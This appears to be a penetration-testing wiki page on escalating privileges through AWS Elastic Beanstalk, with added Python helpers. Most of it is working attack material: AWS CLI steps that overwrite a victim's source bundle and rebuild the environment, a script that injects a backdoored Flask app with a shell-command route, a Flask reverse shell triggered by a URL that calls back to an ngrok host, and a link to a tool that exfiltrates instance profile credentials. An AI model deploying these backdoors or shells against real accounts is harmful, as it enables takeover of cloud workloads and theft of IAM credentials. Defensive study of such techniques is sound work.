Elastic Beanstalk
For more information about Elastic Beanstalk, check:
AWS - Elastic Beanstalk Enum
Performing sensitive actions in Beanstalk requires a large set of sensitive permissions across several different services (Beanstalk itself, S3, EC2, CloudFormation, Auto Scaling, Elastic Load Balancing and `iam:PassRole`). For a reference of what that set looks like, inspect the permissions granted by the managed policy **arn:aws:iam::aws:policy/AdministratorAccess-AWSElasticBeanstalk**.
**`elasticbeanstalk:RebuildEnvironment`, S3 write permissions and many others**
With write permission over the S3 bucket that holds the environment's code and permission to rebuild the application (`elasticbeanstalk:RebuildEnvironment` plus further permissions related to S3, EC2 and CloudFormation), you can modify the code, rebuild the application and have your new code executed the next time the application is accessed. This lets an attacker compromise the application and the credentials of its IAM role (the instance profile attached to the environment's EC2 instances).
```bash
# Create a local folder for the bucket contents
mkdir elasticbeanstalk-eu-west-1-947247140022
cd elasticbeanstalk-eu-west-1-947247140022

# Download the code (Beanstalk buckets are named elasticbeanstalk-<region>-<accountId>)
aws s3 sync s3://elasticbeanstalk-eu-west-1-947247140022 .

# Change the code: unpack the source bundle, edit it, then update the entries inside the zip
unzip 1692777270420-aws-flask-app.zip
zip 1692777270420-aws-flask-app.zip <files to zip>

# Upload the modified bundle over the original key
aws s3 cp 1692777270420-aws-flask-app.zip s3://elasticbeanstalk-eu-west-1-947247140022/1692777270420-aws-flask-app.zip

# Rebuild the environment so the modified bundle gets deployed
aws elasticbeanstalk rebuild-environment --environment-name "env-name"
```
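The `unzip`/`zip` step is the part that is easy to get wrong: if the rewritten archive loses entries such as `requirements.txt` or `.ebextensions/*.config`, the deployment breaks instead of running the new code. The following Python is an added example, not code from the original page: it rewrites a source bundle in memory, replacing only the entries you name and copying every other entry through with its original metadata. The sample bundle contents, the `BACKDOORED_APP` string and its `/cmd` route are constructed here purely for illustration.

```python
import io
import zipfile

# Constructed stand-in for the 1692777270420-aws-flask-app.zip bundle synced from S3:
# the deployed Flask app, its pinned dependencies and an .ebextensions config.
SAMPLE_BUNDLE = {
    "application.py": "from flask import Flask\napplication = Flask(__name__)\n",
    "requirements.txt": "Flask==1.1.2\n",
    ".ebextensions/01_env.config": (
        "option_settings:\n"
        "  aws:elasticbeanstalk:application:environment:\n"
        "    DEBUG: 'false'\n"
    ),
}

# Hypothetical replacement application.py: the same app plus a route that runs a command.
BACKDOORED_APP = (
    "from flask import Flask, request\n"
    "import subprocess\n"
    "application = Flask(__name__)\n"
    "@application.route('/cmd')\n"
    "def cmd():\n"
    "    return subprocess.check_output(request.args['c'], shell=True)\n"
)


def build_bundle(files):
    """Build an in-memory zip from {path: text}; only used to construct the sample bundle."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, text in files.items():
            zf.writestr(name, text)
    return buf.getvalue()


def patch_bundle(bundle_bytes, replacements):
    """Return a new bundle in which the entries named in `replacements` carry new content
    and every other entry is copied through unchanged (same path, mode and timestamp),
    so dependencies, .ebextensions and a Procfile survive. Brand-new paths are appended.
    This is the in-memory equivalent of the 'unzip' + 'zip' pair in the steps above."""
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(bundle_bytes)) as src, \
            zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as dst:
        seen = set()
        for info in src.infolist():
            seen.add(info.filename)
            data = replacements.get(info.filename, src.read(info.filename))
            dst.writestr(info, data.encode() if isinstance(data, str) else data)
        for name, data in replacements.items():
            if name not in seen:
                dst.writestr(name, data.encode() if isinstance(data, str) else data)
    return out.getvalue()


def bundle_entries(bundle_bytes):
    """Sorted list of paths inside a bundle."""
    with zipfile.ZipFile(io.BytesIO(bundle_bytes)) as zf:
        return sorted(zf.namelist())


def read_entry(bundle_bytes, name):
    """Text content of one entry."""
    with zipfile.ZipFile(io.BytesIO(bundle_bytes)) as zf:
        return zf.read(name).decode()


def demo():
    """Patch the sample bundle; the bytes returned are what 'aws s3 cp' would upload over the original key."""
    original = build_bundle(SAMPLE_BUNDLE)
    return patch_bundle(original, {"application.py": BACKDOORED_APP})


if __name__ == "__main__":
    patched = demo()
    print("entries after patching:", bundle_entries(patched))
    print("bundle size:", len(patched), "bytes")
```

Write the returned bytes to the original file name before the `aws s3 cp` step; the object key must stay identical, because `rebuild-environment` redeploys the version the environment already references rather than a new one.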
**`elasticbeanstalk:CreateApplication`, `elasticbeanstalk:CreateEnvironment`, `elasticbeanstalk:CreateApplicationVersion`, `elasticbeanstalk:UpdateEnvironment`, `iam:PassRole`, etc.**
The permissions above, together with several **S3, EC2, CloudFormation, Auto Scaling and Elastic Load Balancing** permissions, are required to create a raw Elastic Beanstalk scenario from scratch. `iam:PassRole` is the one that lets you attach an instance profile (for example `aws-elasticbeanstalk-ec2-role`) to the new environment, so the code you deploy inherits that role's permissions.
Create an AWS Elastic Beanstalk application:

```bash
aws elasticbeanstalk create-application --application-name MyApp
```

Create an AWS Elastic Beanstalk environment (supported platforms):

```bash
aws elasticbeanstalk create-environment --application-name MyApp --environment-name MyEnv --solution-stack-name "64bit Amazon Linux 2 v3.4.2 running Python 3.8" --option-settings Namespace=aws:autoscaling:launchconfiguration,OptionName=IamInstanceProfile,Value=aws-elasticbeanstalk-ec2-role
```

If the environment already exists and you don't want to create a new one, you can update the existing one instead.

Package your application code and dependencies into a ZIP file and upload it to the account's Beanstalk bucket:

```bash
aws s3 cp MyApp.zip s3://elasticbeanstalk-<region>-<accId>/MyApp.zip
```

Create an AWS Elastic Beanstalk application version:

```bash
aws elasticbeanstalk create-application-version --application-name MyApp --version-label MyApp-1.0 --source-bundle S3Bucket="elasticbeanstalk-<region>-<accId>",S3Key="MyApp.zip"
```

Deploy the application version to your AWS Elastic Beanstalk environment:

```bash
aws elasticbeanstalk update-environment --environment-name MyEnv --version-label MyApp-1.0
```
**`elasticbeanstalk:CreateApplicationVersion`, `elasticbeanstalk:UpdateEnvironment`, `cloudformation:GetTemplate`, `cloudformation:DescribeStackResources`, `cloudformation:DescribeStackResource`, `autoscaling:DescribeAutoScalingGroups`, `autoscaling:SuspendProcesses`**
First, following the previous steps, you need to create a legitimate Beanstalk environment in your own account running the code you want to execute in the victim. It can be a simple zip containing these two files, `application.py` and `requirements.txt`.

`application.py`:
```python
from flask import Flask, request, jsonify
import subprocess, os, socket

application = Flask(__name__)


@application.errorhandler(404)
def page_not_found(e):
    return jsonify('404')


@application.route("/")
def index():
    return jsonify('Welcome!')


# Reverse shell trigger: /get_shell?host=<attacker host>&port=<attacker port>
# connects back and hands stdin/stdout/stderr of an interactive /bin/sh to the socket.
@application.route("/get_shell")
def search():
    host = request.args.get('host')
    port = request.args.get('port')
    if host and port:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((host, int(port)))
        os.dup2(s.fileno(), 0)
        os.dup2(s.fileno(), 1)
        os.dup2(s.fileno(), 2)
        p = subprocess.call(["/bin/sh", "-i"])
    return jsonify('done')


if __name__ == "__main__":
    application.run()
```
`requirements.txt`:

```text
click==7.1.2
Flask==1.1.2
itsdangerous==1.1.0
Jinja2==2.11.3
MarkupSafe==1.1.1
Werkzeug==1.0.1
```

A cheaper check is worth doing before going this far: in the Elastic Beanstalk console, the environment's Software configuration (its environment properties) can hold credentials such as database passwords, and anything found there may give access to other AWS services such as S3 buckets, from which you can keep exploring and escalating.
Once your Beanstalk environment is running your reverse shell, it is time to migrate it to the victim environment. To do so you need to update the bucket policy of your own Beanstalk S3 bucket so the victim can access it. Note that the policy below opens the bucket to everyone (and grants `s3:*` on top of the read actions); if you know the victim account ID, restrict the `Principal` to that account instead of `*`:
```json
{
  "Version": "2008-10-17",
  "Statement": [
    {
      "Sid": "eb-af163bf3-d27b-4712-b795-d1e33e331ca4",
      "Effect": "Allow",
      "Principal": {
        "AWS": "*"
      },
      "Action": [
        "s3:ListBucket",
        "s3:ListBucketVersions",
        "s3:GetObject",
        "s3:GetObjectVersion",
        "s3:*"
      ],
      "Resource": [
        "arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022",
        "arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022/*"
      ]
    },
    {
      "Sid": "eb-58950a8c-feb6-11e2-89e0-0800277d041b",
      "Effect": "Deny",
      "Principal": {
        "AWS": "*"
      },
      "Action": "s3:DeleteBucket",
      "Resource": "arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022"
    }
  ]
}
```
```bash
# Use a new --version-label and point the source bundle at the bucket in your own account
aws elasticbeanstalk create-application-version --application-name MyApp --version-label MyApp-2.0 --source-bundle S3Bucket="elasticbeanstalk-<region>-<accId>",S3Key="revshell.zip"

# This step needs the extra permissions listed above; deploy the version you just registered
aws elasticbeanstalk update-environment --environment-name MyEnv --version-label MyApp-2.0

# To get your reverse shell, access the exposed web URL with params such as:
# http://myenv.eba-ankaia7k.us-east-1.elasticbeanstalk.com/get_shell?host=0.tcp.eu.ngrok.io&port=13528
```
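The bucket policy above hands full control of your staging bucket to every AWS principal on the internet, which is more than the cross-account deploy needs. As an added example (not code from the original page), the following Python holds the page's policy as data, builds a variant scoped to the victim account, and checks both for wildcard principals and wildcard actions. The bucket name is the one from the page; `111122223333` is a placeholder victim account ID and the Sids `AllowVictimAccountToReadBundle` and `DenyBucketDeletion` are names chosen here.

```python
import json

# Bucket policy as shown above: Allow to Principal "*" (including s3:*), Deny on bucket deletion.
PAGE_POLICY = {
    "Version": "2008-10-17",
    "Statement": [
        {
            "Sid": "eb-af163bf3-d27b-4712-b795-d1e33e331ca4",
            "Effect": "Allow",
            "Principal": {"AWS": "*"},
            "Action": ["s3:ListBucket", "s3:ListBucketVersions",
                       "s3:GetObject", "s3:GetObjectVersion", "s3:*"],
            "Resource": ["arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022",
                         "arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022/*"],
        },
        {
            "Sid": "eb-58950a8c-feb6-11e2-89e0-0800277d041b",
            "Effect": "Deny",
            "Principal": {"AWS": "*"},
            "Action": "s3:DeleteBucket",
            "Resource": "arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022",
        },
    ],
}


def cross_account_bundle_policy(bucket, victim_account_id):
    """Same intent as the page's policy, scoped: only principals of `victim_account_id`
    (placeholder account in the demo) may list the bucket and read the bundle; the
    Deny on DeleteBucket is kept. No wildcard principal, no s3:*."""
    bucket_arn = f"arn:aws:s3:::{bucket}"
    return {
        "Version": "2012-10-17",
        "Statement": [
            {
                "Sid": "AllowVictimAccountToReadBundle",
                "Effect": "Allow",
                "Principal": {"AWS": f"arn:aws:iam::{victim_account_id}:root"},
                "Action": ["s3:ListBucket", "s3:ListBucketVersions",
                           "s3:GetObject", "s3:GetObjectVersion"],
                "Resource": [bucket_arn, f"{bucket_arn}/*"],
            },
            {
                "Sid": "DenyBucketDeletion",
                "Effect": "Deny",
                "Principal": {"AWS": "*"},
                "Action": "s3:DeleteBucket",
                "Resource": bucket_arn,
            },
        ],
    }


def _as_list(value):
    return [value] if isinstance(value, str) else list(value)


def _aws_principals(principal):
    """Normalise the Principal element ("*" or {"AWS": ...}) to a list of strings."""
    if principal == "*":
        return ["*"]
    if isinstance(principal, dict):
        return _as_list(principal.get("AWS", []))
    return []


def public_allow_statements(policy):
    """Sids of Allow statements usable by any AWS principal (Principal "*" or {"AWS": "*"})."""
    return [
        st.get("Sid", "<no sid>")
        for st in policy["Statement"]
        if st.get("Effect") == "Allow" and "*" in _aws_principals(st.get("Principal"))
    ]


def wildcard_actions(policy):
    """Wildcard actions granted by Allow statements; s3:* makes the specific reads redundant."""
    return sorted({
        action
        for st in policy["Statement"] if st.get("Effect") == "Allow"
        for action in _as_list(st["Action"]) if action.endswith("*")
    })


def policy_json(policy):
    """Serialised form for: aws s3api put-bucket-policy --bucket <bucket> --policy file://policy.json"""
    return json.dumps(policy, indent=2)


if __name__ == "__main__":
    scoped = cross_account_bundle_policy("elasticbeanstalk-us-east-1-947247140022", "111122223333")
    print("page policy, public Allow Sids:", public_allow_statements(PAGE_POLICY))
    print("page policy, wildcard actions:", wildcard_actions(PAGE_POLICY))
    print("scoped policy, public Allow Sids:", public_allow_statements(scoped))
    print(policy_json(scoped))
```

Two practical caveats: the wildcard version only applies if S3 Block Public Access is turned off on your bucket, since its BlockPublicPolicy setting rejects bucket policies that grant public access; and the scoped version still relies on the victim-side principals that fetch the bundle (the caller of `create-application-version` and the environment's instance profile) having their own `s3:GetObject` permission, as a cross-account grant on the bucket alone is not enough.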
Alternatively, [MaliciousBeanstalk](https://github.com/fr4nk3nst1ner/MaliciousBeanstalk) can be used to deploy a Beanstalk application that takes advantage of overly permissive Instance Profiles. Deploying this application will execute a binary (e.g., [Mythic](https://github.com/its-a-feature/Mythic) payload) and/or exfiltrate the instance profile security credentials (use with caution, GuardDuty alerts when instance profile credentials are used outside the ec2 instance).
The developer intends to establish the reverse shell with Netcat or Socat as a next step, keeping exploitation contained to the EC2 instance to avoid detections.